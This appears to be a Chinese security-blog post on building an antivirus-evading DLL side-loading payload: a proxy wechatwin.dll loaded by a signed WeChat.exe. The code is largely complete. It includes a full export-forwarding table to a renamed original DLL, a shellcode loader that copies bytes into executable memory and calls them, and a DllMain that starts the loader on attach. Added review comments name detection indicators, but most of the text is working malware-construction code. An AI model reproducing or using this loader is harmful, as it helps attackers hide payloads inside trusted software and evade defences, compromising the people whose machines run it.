白加黑源码免杀学习
概述
白程序:WeChat.exe
恶意dll:wechatwin.dll
制作流程
- 获取导出函数列表
/*
 * Export forwarding table for the proxy DLL.
 *
 * Every export that the host process expects from the original
 * wechatwin.dll is re-exported here and forwarded to a module named
 * `tmp3ACF` (presumably the renamed original DLL placed beside this one;
 * the page does not show how it is produced -- confirm).  The ordinal
 * after the comma (@1 .. @36) is preserved so that imports by ordinal
 * still resolve.
 *
 * NOTE(review): a forwarded-export table whose target is an unexpected
 * module name (here `tmp3ACF`) is a static indicator worth flagging when
 * triaging a DLL that sits next to a signed host binary.  No symbol is
 * implemented locally; anything the host calls is handed straight through.
 */
#pragma comment(linker, "/export:??0IChannelLogWriter@@QAE@$$QAV0@@Z=tmp3ACF.??0IChannelLogWriter@@QAE@$$QAV0@@Z,@1")
#pragma comment(linker, "/export:??0IChannelLogWriter@@QAE@ABV0@@Z=tmp3ACF.??0IChannelLogWriter@@QAE@ABV0@@Z,@2")
#pragma comment(linker, "/export:??0IChannelLogWriter@@QAE@XZ=tmp3ACF.??0IChannelLogWriter@@QAE@XZ,@3")
#pragma comment(linker, "/export:??4IChannelLogWriter@@QAEAAV0@$$QAV0@@Z=tmp3ACF.??4IChannelLogWriter@@QAEAAV0@$$QAV0@@Z,@4")
#pragma comment(linker, "/export:??4IChannelLogWriter@@QAEAAV0@ABV0@@Z=tmp3ACF.??4IChannelLogWriter@@QAEAAV0@ABV0@@Z,@5")
#pragma comment(linker, "/export:??4ILogWriter@@QAEAAV0@$$QAV0@@Z=tmp3ACF.??4ILogWriter@@QAEAAV0@$$QAV0@@Z,@6")
#pragma comment(linker, "/export:??4ILogWriter@@QAEAAV0@ABV0@@Z=tmp3ACF.??4ILogWriter@@QAEAAV0@ABV0@@Z,@7")
#pragma comment(linker, "/export:??_7IChannelLogWriter@@6B@=tmp3ACF.??_7IChannelLogWriter@@6B@,@8")
#pragma comment(linker, "/export:?AddExtraMem@TXBugReport@@YAHKI@Z=tmp3ACF.?AddExtraMem@TXBugReport@@YAHKI@Z,@9")
#pragma comment(linker, "/export:?AddExtraMem@TXBugReport@@YAHPAXI@Z=tmp3ACF.?AddExtraMem@TXBugReport@@YAHPAXI@Z,@10")
#pragma comment(linker, "/export:?AddIgnoreHookCheckModule@TXBugReport@@YAXPB_W@Z=tmp3ACF.?AddIgnoreHookCheckModule@TXBugReport@@YAXPB_W@Z,@11")
#pragma comment(linker, "/export:?AddReleaseMonitorPoint@TXBugReport@@YAXPAJ@Z=tmp3ACF.?AddReleaseMonitorPoint@TXBugReport@@YAXPAJ@Z,@12")
#pragma comment(linker, "/export:?DoBugReport@TXBugReport@@YAJPAU_EXCEPTION_POINTERS@@PB_W@Z=tmp3ACF.?DoBugReport@TXBugReport@@YAJPAU_EXCEPTION_POINTERS@@PB_W@Z,@13")
#pragma comment(linker, "/export:?GetBugReportFlag@TXBugReport@@YAKXZ=tmp3ACF.?GetBugReportFlag@TXBugReport@@YAKXZ,@14")
#pragma comment(linker, "/export:?GetBugReportInfo@TXBugReport@@YAPAUtagBugReportInfo@1@XZ=tmp3ACF.?GetBugReportInfo@TXBugReport@@YAPAUtagBugReportInfo@1@XZ,@15")
#pragma comment(linker, "/export:?GetCustomFiltFunc@TXBugReport@@YAP6AHPAU_EXCEPTION_POINTERS@@@ZXZ=tmp3ACF.?GetCustomFiltFunc@TXBugReport@@YAP6AHPAU_EXCEPTION_POINTERS@@@ZXZ,@16")
#pragma comment(linker, "/export:?InitBugReport@TXBugReport@@YAXPB_W000GGKHHKKP6GHPAUtagBugReportInfo@1@PBD200PAPAXPAKPAX@Z@Z=tmp3ACF.?InitBugReport@TXBugReport@@YAXPB_W000GGKHHKKP6GHPAUtagBugReportInfo@1@PBD200PAPAXPAKPAX@Z@Z,@17")
#pragma comment(linker, "/export:?InitBugReportEx@TXBugReport@@YAXPB_W000GGKHHKKP6GHPAUtagBugReportInfo@1@PBD200PAPAXPAKPAX@ZH@Z=tmp3ACF.?InitBugReportEx@TXBugReport@@YAXPB_W000GGKHHKKP6GHPAUtagBugReportInfo@1@PBD200PAPAXPAKPAX@ZH@Z,@18")
#pragma comment(linker, "/export:?RaiseSelfFatalException@TXBugReport@@YAXW4SelfException@1@@Z=tmp3ACF.?RaiseSelfFatalException@TXBugReport@@YAXW4SelfException@1@@Z,@19")
#pragma comment(linker, "/export:?RecordCallStackIfNeed@TXBugReport@@YAXPAJ@Z=tmp3ACF.?RecordCallStackIfNeed@TXBugReport@@YAXPAJ@Z,@20")
#pragma comment(linker, "/export:?SetBugReportFlag@TXBugReport@@YAHK@Z=tmp3ACF.?SetBugReportFlag@TXBugReport@@YAHK@Z,@21")
#pragma comment(linker, "/export:?SetBugReportPath@TXBugReport@@YAHPB_W@Z=tmp3ACF.?SetBugReportPath@TXBugReport@@YAHPB_W@Z,@22")
#pragma comment(linker, "/export:?SetBugReportUin@TXBugReport@@YAXKH@Z=tmp3ACF.?SetBugReportUin@TXBugReport@@YAXKH@Z,@23")
#pragma comment(linker, "/export:?SetCustomFiltFunc@TXBugReport@@YAXP6AHPAU_EXCEPTION_POINTERS@@@Z@Z=tmp3ACF.?SetCustomFiltFunc@TXBugReport@@YAXP6AHPAU_EXCEPTION_POINTERS@@@Z@Z,@24")
#pragma comment(linker, "/export:?SetExtInfo@TXBugReport@@YAHKKPB_W@Z=tmp3ACF.?SetExtInfo@TXBugReport@@YAHKKPB_W@Z,@25")
#pragma comment(linker, "/export:?SetExtRptFilePath@TXBugReport@@YAHPB_W0@Z=tmp3ACF.?SetExtRptFilePath@TXBugReport@@YAHPB_W0@Z,@26")
#pragma comment(linker, "/export:?SetLogFileMd5Dir@TXBugReport@@YAHPB_W00@Z=tmp3ACF.?SetLogFileMd5Dir@TXBugReport@@YAHPB_W00@Z,@27")
#pragma comment(linker, "/export:?UninitBugReport@TXBugReport@@YAXXZ=tmp3ACF.?UninitBugReport@TXBugReport@@YAXXZ,@28")
#pragma comment(linker, "/export:?ValidateBugReport@TXBugReport@@YAXXZ=tmp3ACF.?ValidateBugReport@TXBugReport@@YAXXZ,@29")
#pragma comment(linker, "/export:?pfPostBugReport@TXBugReport@@3P6AXXZA=tmp3ACF.?pfPostBugReport@TXBugReport@@3P6AXXZA,@30")
#pragma comment(linker, "/export:?pfPreBugReport@TXBugReport@@3P6AXXZA=tmp3ACF.?pfPreBugReport@TXBugReport@@3P6AXXZA,@31")
#pragma comment(linker, "/export:SignWith3Des=tmp3ACF.SignWith3Des,@32")
#pragma comment(linker, "/export:StartWachat=tmp3ACF.StartWachat,@33")
#pragma comment(linker, "/export:_TlsGetData@12=tmp3ACF._TlsGetData@12,@34")
#pragma comment(linker, "/export:_TlsStoreData@12=tmp3ACF._TlsStoreData@12,@35")
#pragma comment(linker, "/export:__ASSERT=tmp3ACF.__ASSERT,@36")
shellcode写入内存加载
/*
 * Thread routine (CreateThread signature) that copies the embedded byte
 * array `shellcode` into a newly allocated executable region and calls it.
 *
 * @param pPara  Thread argument; unused (DllMain passes NULL).
 * @return 0 -- only reached if the called code returns.
 *
 * `shellcode`, `first` and `a` are not declared on this page; presumably
 * file-scope byte arrays -- confirm.  The two memcpy calls into
 * `shellcode` overwrite two bytes at offset 0 and two at offset 834 in
 * place before the array is copied out; what those bytes are is not shown.
 *
 * NOTE(review): VirtualAlloc(PAGE_EXECUTE_READWRITE) followed by a memcpy
 * and an indirect call through the new region is the textbook in-memory
 * loader sequence; user-mode API hooks on VirtualAlloc and scans for
 * private RWX regions are the usual detection points.  The VirtualAlloc
 * result is never checked, so a failed allocation turns the third memcpy
 * into a write through NULL.
 */
DWORD WINAPI jmp_shellcode(LPVOID pPara) {
    /* Single committed RWX region sized to the whole shellcode array. */
    void* exec = VirtualAlloc(0, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    /* In-place patches of the source array before it is copied. */
    memcpy(shellcode, first, 2);
    memcpy(shellcode + 834, a, 2);
    /* Copy the patched bytes into the executable region. */
    memcpy(exec, shellcode, sizeof shellcode);
    /* Transfer control; no return value and no exception handling around it. */
    ((void(*)())exec)();
    return 0;
}
DllMain执行jmp_shellcode
/*
 * DLL entry point.  On DLL_PROCESS_ATTACH it spawns jmp_shellcode on a new
 * thread and immediately drops the thread handle; the other three
 * notifications do nothing.
 *
 * @param hDll        Module handle of this DLL (unused here).
 * @param dwReason    One of DLL_PROCESS_ATTACH, DLL_PROCESS_DETACH,
 *                    DLL_THREAD_ATTACH, DLL_THREAD_DETACH.
 * @param lpReserved  Unused.
 * @return TRUE unconditionally, so the host never sees the load fail.
 *
 * NOTE(review): DllMain runs under the loader lock, which is why the
 * payload is pushed onto a separate thread instead of being run inline.
 * CreateThread's result is not checked; on failure CloseHandle(NULL) is
 * called and the error is silently lost.  A DLL that creates a thread the
 * moment it is attached -- before the host has called any of its exports --
 * is itself a common behavioural heuristic for side-loaded modules.
 */
BOOL WINAPI DllMain(HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
    HANDLE threadHandle;
    switch (dwReason) {
    case DLL_PROCESS_ATTACH:
        // Create a thread and close the handle as we do not want to use it to wait for it
        threadHandle = CreateThread(NULL, 0, jmp_shellcode, NULL, 0, NULL);
        CloseHandle(threadHandle);
        break;
    case DLL_PROCESS_DETACH:
        // Code to run when the DLL is freed
        break;
    case DLL_THREAD_ATTACH:
        // Code to run when a thread is created during the DLL's lifetime
        break;
    case DLL_THREAD_DETACH:
        // Code to run when a thread ends normally.
        break;
    }
    return TRUE;
}
原创文章,作者:moonsec,如若转载,请注明出处:https://www.moonsec.com/3180.html